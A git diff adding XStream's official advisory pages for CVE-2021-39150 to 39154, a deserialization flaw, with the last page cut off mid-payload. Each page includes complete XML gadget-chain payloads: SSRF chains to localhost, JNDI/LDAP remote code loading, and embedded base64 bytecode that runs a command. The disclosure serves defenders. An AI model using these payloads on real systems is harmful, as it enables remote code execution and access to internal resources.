+ <title>CVE-2021-39150</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39150: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java
+ runtime version 14 to 8. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal
+ required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <dynamic-proxy>
+ <interface>java.lang.Comparable</interface>
+ <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
+ <owner/>
+ <managedObjectManagerClosed>false</managedObjectManagerClosed>
+ <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
+ <stubHandlers>
+ <entry>
+ <method>
+ <class>java.lang.Comparable</class>
+ <name>compareTo</name>
+ <parameter-types>
+ <class>java.lang.Object</class>
+ </parameter-types>
+ </method>
+ <com.sun.xml.internal.ws.client.sei.StubHandler>
+ <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
+ <indices>
+ <int>0</int>
+ </indices>
+ <getters>
+ <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
+ </getters>
+ <accessors>
+ <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ <val_-isJAXBElement>false</val_-isJAXBElement>
+ <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
+ <type>int</type>
+ <field>
+ <name>hash</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </val_-getter>
+ <val_-isListType>false</val_-isListType>
+ <val_-n>
+ <namespaceURI/>
+ <localPart>hash</localPart>
+ <prefix/>
+ </val_-n>
+ <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
+ <type>java.lang.String</type>
+ <method>
+ <class>jdk.nashorn.internal.runtime.Source</class>
+ <name>readFully</name>
+ <parameter-types>
+ <class>java.net.URL</class>
+ </parameter-types>
+ </method>
+ </val_-setter>
+ <outer-class>
+ <propertySetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field>
+ <name>serialPersistentFields</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>java.util.Comparator</type>
+ <field>
+ <name>CASE_INSENSITIVE_ORDER</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>long</type>
+ <field>
+ <name>serialVersionUID</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[C</type>
+ <field>
+ <name>value</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>int</type>
+ <field reference='../../../../../val_-getter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ </propertySetters>
+ <propertyGetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>java.util.Comparator</type>
+ <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>long</type>
+ <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[C</type>
+ <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
+ </entry>
+ </propertyGetters>
+ <elementLocalNameCollision>false</elementLocalNameCollision>
+ <contentClass>java.lang.String</contentClass>
+ <elementDeclaredTypes/>
+ </outer-class>
+ </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ </accessors>
+ <wrapper>java.lang.Object</wrapper>
+ <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
+ <dynamicWrapper>false</dynamicWrapper>
+ </bodyBuilder>
+ <isOneWay>false</isOneWay>
+ </com.sun.xml.internal.ws.client.sei.StubHandler>
+ </entry>
+ </stubHandlers>
+ <clientConfig>false</clientConfig>
+ </databinding>
+ <methodHandlers>
+ <entry>
+ <method reference='../../../databinding/stubHandlers/entry/method'/>
+ <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ <owner reference='../../../..'/>
+ <method reference='../../../../databinding/stubHandlers/entry/method'/>
+ <isVoid>false</isVoid>
+ <isOneway>false</isOneway>
+ </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ </entry>
+ </methodHandlers>
+ </handler>
+ </dynamic-proxy>
+ <url>http://localhost:8080/internal/</url>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information
+ to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39151.html b/xstream-distribution/src/content/CVE-2021-39151.html
new file mode 100644
index 0000000000000000000000000000000000000000..93708aa57891d74df6f36b214f02148860018fff
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39151.html
@@ -0,0 +1,177 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 9. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39151</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39151: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create an empty EventListenerList and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><javax.swing.event.EventListenerList serialization='custom'>
+ <javax.swing.event.EventListenerList>
+ <default>
+ <listenerList>
+ <javax.swing.undo.UndoManager>
+ <hasBeenDone>true</hasBeenDone>
+ <alive>true</alive>
+ <inProgress>true</inProgress>
+ <edits>
+ <com.sun.xml.internal.ws.api.message.Packet>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
+ <cleaned>false</cleaned>
+ <entries>
+ <com.sun.jndi.ldap.LdapEntry>
+ <DN>cn=four,cn=three,cn=two,cn=one</DN>
+ <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ignoreCase>false</ignoreCase>
+ </default>
+ <int>4</int>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>objectClass</attrID>
+ </default>
+ <int>1</int>
+ <string>javanamingreference</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default>
+ <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
+ <com.sun.jndi.ldap.LdapName>
+ <string>cn=four,cn=three,cn=two,cn=one</string>
+ <boolean>false</boolean>
+ </com.sun.jndi.ldap.LdapName>
+ </rdn>
+ </default>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaCodeBase</attrID>
+ </default>
+ <int>1</int>
+ <string>http://127.0.0.1:8080/</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default/>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaClassName</attrID>
+ </default>
+ <int>1</int>
+ <string>refObj</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default/>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaFactory</attrID>
+ </default>
+ <int>1</int>
+ <string>ExecTemplateJDK7</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default/>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </javax.naming.directory.BasicAttribute>
+ </attributes>
+ </com.sun.jndi.ldap.LdapEntry>
+ </entries>
+ <limit>2</limit>
+ <posn>0</posn>
+ <homeCtx/>
+ <more>true</more>
+ <hasMoreCalled>true</hasMoreCalled>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </com.sun.xml.internal.ws.api.message.Packet>
+ </edits>
+ <indexOfNextAdd>0</indexOfNextAdd>
+ <limit>100</limit>
+ </javax.swing.undo.UndoManager>
+ </listenerList>
+ </default>
+ <string>java.lang.InternalError</string>
+ <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
+ <null/>
+ </javax.swing.event.EventListenerList>
+</javax.swing.event.EventListenerList>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39152.html b/xstream-distribution/src/content/CVE-2021-39152.html
new file mode 100644
index 0000000000000000000000000000000000000000..24d1a86cc2790819248b1ba28f1963271183817f
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39152.html
@@ -0,0 +1,87 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 10. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39152</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39152: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java
+ runtime version 14 to 8. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal
+ required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><map>
+ <entry>
+ <jdk.nashorn.internal.runtime.Source_-URLData>
+ <url>http://localhost:8080/internal/</url>
+ <cs>GBK</cs>
+ <hash>1111</hash>
+ <array>b</array>
+ <length>0</length>
+ <lastModified>0</lastModified>
+ </jdk.nashorn.internal.runtime.Source_-URLData>
+ <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
+ </entry>
+ <entry>
+ <jdk.nashorn.internal.runtime.Source_-URLData>
+ <url>http://localhost:8080/internal/</url>
+ <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
+ <hash>1111</hash>
+ <array>b</array>
+ <length>0</length>
+ <lastModified>0</lastModified>
+ </jdk.nashorn.internal.runtime.Source_-URLData>
+ <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
+ </entry>
+</map>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>m0d9 of the Security Team of Alibaba Cloud found and reported the issue to XStream and provided the required
+ information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39153.html b/xstream-distribution/src/content/CVE-2021-39153.html
new file mode 100644
index 0000000000000000000000000000000000000000..db4aab3923d3d9d6b1a066c3b6b7d935ac0b8fce
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39153.html
@@ -0,0 +1,126 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 11. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39153</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39153: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java
+ runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal required
+ types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>
+ <outer-class>
+ <verbose>0</verbose>
+ <effort>0</effort>
+ <optDumpBands>false</optDumpBands>
+ <optDebugBands>false</optDebugBands>
+ <optVaryCodings>false</optVaryCodings>
+ <optBigStrings>false</optBigStrings>
+ <isReader>false</isReader>
+ <bandHeaderBytePos>0</bandHeaderBytePos>
+ <bandHeaderBytePos0>0</bandHeaderBytePos0>
+ <archiveOptions>0</archiveOptions>
+ <archiveSize0>0</archiveSize0>
+ <archiveSize1>0</archiveSize1>
+ <archiveNextCount>0</archiveNextCount>
+ <attrClassFileVersionMask>0</attrClassFileVersionMask>
+ <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>
+ <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <default>
+ <__name>Pwnr</__name>
+ <__bytecodes>
+ <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>
+ <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
+ </__bytecodes>
+ <__transletIndex>-1</__transletIndex>
+ <__indentNumber>0</__indentNumber>
+ </default>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ </bean>
+ <localCache>
+ <methods>
+ <entry>
+ <string>getOutputProperties</string>
+ <list>
+ <method>
+ <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
+ <name>getOutputProperties</name>
+ <parameter-types/>
+ </method>
+ </list>
+ </entry>
+ </methods>
+ </localCache>
+ </attrIndexTable>
+ <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>
+ </outer-class>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string-array>
+ <string>yxxx</string>
+ <string>outputProperties</string>
+ </string-array>
+ <string-array>
+ <string>yxxx</string>
+ </string-array>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided
+ the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39154.html b/xstream-distribution/src/content/CVE-2021-39154.html
new file mode 100644
index 0000000000000000000000000000000000000000..9d23032636811533a5caee8a8dc3212bda0e436f
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39154.html
@@ -0,0 +1,120 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 31. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39154</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39154: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>0</int>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale>zh_CN</defaultLocale>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ <javax.swing.MultiUIDefaults>
+ <default>
+ <tables>
+ <javax.swing.UIDefaults serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>1</int>
+ <string>ggg</string>
+ <javax.swing.UIDefaults_-ProxyLazyValue>
+ <className>javax.naming.InitialContext</className>
+ <methodName>doLookup</methodName>
+ <args>
+ <arg>ldap://localhost:1099/CallRemoteMethod</arg>
+ </args>
+ </javax.swing.UIDefaults_-ProxyLazyValue>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
